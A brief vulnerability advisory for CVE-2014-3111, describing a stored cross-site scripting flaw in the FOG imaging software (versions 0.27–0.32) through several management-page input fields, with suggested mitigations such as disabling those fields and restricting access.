CVE-2014-3111

Name of the Vulnerable Software and Affected Versions FOG versions 0.27 through 0.32

Description The issue allows remote authenticated users to inject arbitrary web script or HTML via several fields, including the Printer Model field to the "Printer Management" page, the Image Name field to the "Image Management" page, the Storage Group Name field to the "Storage Management" page, the Username field to the "User Cleanup FOG Configuration" page, or the Directory Path field to the "Directory Cleaner FOG Configuration" page.

Recommendations For FOG versions 0.27 through 0.32, consider disabling the fields that allow user input to the Printer Management, Image Management, Storage Management, User Cleanup FOG Configuration, and Directory Cleaner FOG Configuration pages until a patch is available. Restrict access to these pages to minimize the risk of exploitation. Avoid using the vulnerable fields in the affected pages until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.